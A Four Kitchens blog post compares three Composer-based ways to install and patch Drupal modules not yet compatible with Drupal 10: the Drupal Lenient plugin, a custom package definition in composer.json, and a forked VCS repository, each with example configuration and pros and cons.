As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.
Why do we have this problem?

New Drupal developers often have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module's dependencies: a .info.yml file and, for some modules, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and the composer.json file, Drupal.org built its own packagist, a repository of Composer packages, which reads the .info.yml file from the root of the project and creates Composer version constraints from it. For example, if the .info.yml file contained the following:
name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org's packagist would create the following for the release that contained that .info.yml file, saving the contributing developer a lot of trouble.
{
  "type": "drupal-module",
  "name": "drupal/my_module",
  "require": {
    "drupal/core": "^8.8 || ^9",
    "drupal/ctools": "*"
  }
}

I hit on something there, though: it creates that metadata for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org's packagist, and Drupal.org doesn't create a new release entry for every patch file in the issue queue. So you are left with the question, "How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible with Drupal 10?"
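To make the mechanism concrete, here is a rough Python sketch of the kind of mapping the packagist performs. This is illustrative only: the real service derives the package name from the project's machine name and handles many more fields, and the dictionary shape below is an assumption standing in for a parsed .info.yml file.

```python
def info_to_composer(info: dict) -> dict:
    """Sketch of how Drupal.org's packagist might derive Composer
    metadata from a parsed .info.yml file (illustrative only)."""
    require = {"drupal/core": info["core_version_requirement"]}
    for dep in info.get("dependencies", []):
        # "ctools:ctools" means "the ctools module from the ctools project";
        # with no constraint given in the .info.yml, fall back to "*".
        project = dep.split(":", 1)[0]
        require["drupal/" + project] = "*"
    return {
        "type": "drupal-" + info.get("type", "module"),
        # Assumption: deriving a machine name from the label; the real
        # service uses the project's actual machine name.
        "name": "drupal/" + info["name"].lower().replace(" ", "_"),
        "require": require,
    }

info = {
    "name": "My Module",
    "type": "module",
    "core_version_requirement": "^8.8 || ^9",
    "dependencies": ["ctools:ctools"],
}
print(info_to_composer(info))
```

Running it on the example .info.yml data above yields the same structure as the generated package metadata shown earlier.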
Drupal Lenient

One of the easiest methods for those who don't understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed package. Package types are introduced to us through the Composer Installers plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to a project compared with using core Composer features alone.
Drupal Lenient works by taking any allowed package pulled in via Composer and replacing its version constraint for drupal/core with, at the time of this writing, "^8 || ^9 || ^10". So where the requirements might look like the earlier example, "drupal/core": "^8.8 || ^9", they are replaced, making it possible to install the module alongside Drupal 10 even though it might not be compatible yet. This allows you to patch, test, or use the module as is, much like if you had downloaded the zip and thrown it into your custom modules directory.
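In other words, sticking with the hypothetical drupal/my_module from earlier, a requirement published as:

```json
{
  "require": {
    "drupal/core": "^8.8 || ^9"
  }
}
```

is treated by the plugin as if it had been published as:

```json
{
  "require": {
    "drupal/core": "^8 || ^9 || ^10"
  }
}
```

No file on disk changes; the rewrite happens in memory while Composer resolves dependencies, which is why it only affects packages you have explicitly allowed.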
An example may look like this:
{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/my_module": "1.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "drupal-lenient": {
      "allowed-list": ["drupal/my_module"]
    },
    "patches": {
      "drupal/my_module": {
        "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

Note the Drupal Lenient allowed-list. Also note that you will need to make sure the plugin is installed before trying to install the module that doesn't yet support Drupal 10. If you want an excellent step-by-step, Matt put one together in the Readme.
The pros:
- Easy-peasy to install
- Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition
The cons:
- Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
- PHP devs not familiar with Drupal Lenient won’t know to look for it
- Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
- Patches to other dependencies inside composer.json still require you to run through some hoops
Custom package

If you want more control over what the module can and cannot do, while keeping to core Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is meant to be applied against. It should be stated in the issue queue and, per best practice, is usually a dev version.
If you are a perfectionist, you can use composer install -vvv to find the URL or cache file that the module came from on packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.
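As a rough illustration of that URL-to-cache-filename translation (the exact character set Composer sanitizes is an assumption here; check your own vendor cache to confirm), the mapping can be sketched as:

```python
import re

def cache_filename(url: str) -> str:
    # Replace everything outside a conservative safe set with dashes,
    # mimicking how Composer derives cache filenames from repository URLs.
    # (Assumption: the real safe set Composer uses may differ slightly.)
    return re.sub(r"[^a-zA-Z0-9_.]", "-", url)

print(cache_filename(
    "https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json"
))
# -> https---packages.drupal.org-files-packages-8-p2-drupal-my_module.json
```

That dashed form is what to grep for under Composer's cache directory when hunting for the package definition.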
With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.
Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.
Looking through the issue queue, we see "Automated Drupal 10 compatibility fixes," which has a patch on it. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the "repositories" section as a type "package."
Which should make your project look something like this:
{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": ["Drupal", "Context", "Active trail", "Breadcrumbs"],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {},
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

Now let's change our version criteria:
…
  "description": "Set the active trail based on context.",
  "require": {
    "drupal/context": "^4.1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
…

And then add our patch:
…
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
…

Here, you will need to check whether the patch modifies composer.json. If it does, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:
…
  "description": "Set the active trail based on context.",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
…

Lastly, sometimes you run into complications with the order in which packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist entry.
…
  {
    "type": "composer",
    "url": "https://packages.drupal.org/8",
    "exclude": ["drupal/context_active_trail"]
  }
…

Our final composer.json for our project could look something like this with all the edits:
{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": ["Drupal", "Context", "Active trail", "Breadcrumbs"],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": ["drupal/context_active_trail"]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

The pros:
- Uses more core Composer functionality
- A PHP developer will better understand what’s going on here
- You are in complete control of how this module package and version are defined
- All the work is in one file
The cons:
- Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
- That’s a messy composer.json for the project
- If you have to use exclude, you have to leave it to outside forces to let you know when the module finally puts out an actual D10-ready version, and then undo all of this work
Standard PHP Composer best practice says that if you make modifications to a package, you fork it, maintain your modifications, and provide a pull request if it's functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that's what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don't want. They are a moving dot.
For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:
- Clone the module to your local computer using the git instructions for the module in question
- Check out the branch you want to base your changes on
- Create a new repository on GitHub
- Add it as a remote: git remote add github git@github.com:fourkitchens/context_active_trail.git
- Push it! git push github 8.x-2.x
You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.
If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:
{
  "name": "drupal/context_active_trail",
  "type": "drupal-module",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
}

This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.
Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:
{
  "type": "vcs",
  "url": "https://github.com/fourkitchens/context_active_trail.git"
},

The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.
Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.
…
  {
    "type": "composer",
    "url": "https://packages.drupal.org/8",
    "exclude": ["drupal/context_active_trail"]
  }
…

Now, since Drupal packagist isn't here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:
"drupal/context_active_trail": "dev-8.x-2.x",Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:
{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": ["drupal/context_active_trail"]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "dev-8.x-2.x"
  }
}

It makes for a much cleaner project composer.json, but now you've split the work into two locations, which requires some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this approach has the least resistance and gets those changes out more quickly.
The pros:
- Reusability
- Two smaller, simpler chunks of work
- Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.
The cons:
- Changes are in two separate places
- Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
- Requires maintenance and synchronization when upgrades happen
As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.
The post Using Composer for modules not ready for the next major version of Drupal appeared first on Four Kitchens.